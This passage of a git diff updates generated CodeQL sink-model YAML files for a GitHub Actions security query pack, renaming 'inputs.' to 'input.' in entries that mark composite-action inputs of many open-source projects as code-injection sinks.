"code-injection", "generated"] \ No newline at end of file + - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 94c7adf250a..8ca21196194 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file + - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 85632a06a75..7f19fd1f6a6 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] - - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file + - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "input.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 9f002168214..1889fcff144 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] - - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file + - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f1191e5c1c6..f8243352f45 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] - - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index b0e30669c2e..bd2015a7096 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] - - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index e26f0a886d9..501123a82fe 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file + - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 4b40b2fda8a..1a17e3db2b8 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] - - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 06b6e37ea1c..a125a4bfa8c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file + - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index dab53d9d5a3..e8d0cc64792 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index ce485e688f2..736c84b68cc 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file + - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index ab1cac6b691..acb5d462d15 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: sourceModel 
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 82d69349e3a..aedeb4e1023 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 13a6bfe9233..0d8afb086c9 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] - - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file + - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "input.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 163abb26185..4756acbf306 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 3be0de43329..a0e4acec75a 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 2b0b84e172b..6acfcf9773f 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] - - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file + - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "input.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index ba213f0363b..7e0deeea906 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] - - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d93b946f3d7..18678fe9ecd 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] - - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file + - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "input.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 40adbe1fc29..d9d492f79cd 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file + - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 293d8a832bd..d3046ff1fc4 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index c72000641ce..845fba40a6c 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 53929ab8ed1..bcf51805710 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file + - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index 1330f370747..e1ff1fa3497 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file + - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index d9d9c6770bc..4c5ef712e58 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml 
@@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file + - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"] + - 
["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index faf1d7ed5c5..31e1f562877 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file + - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 12ae92c149b..298ba1ccbe3 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - 
["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 61001620017..0dc57625890 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index 1d30610cfd1..c6fc16750f8 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 867dc33f432..0cbbd38d428 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 87b014cbdd6..acc6cb91c07 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - 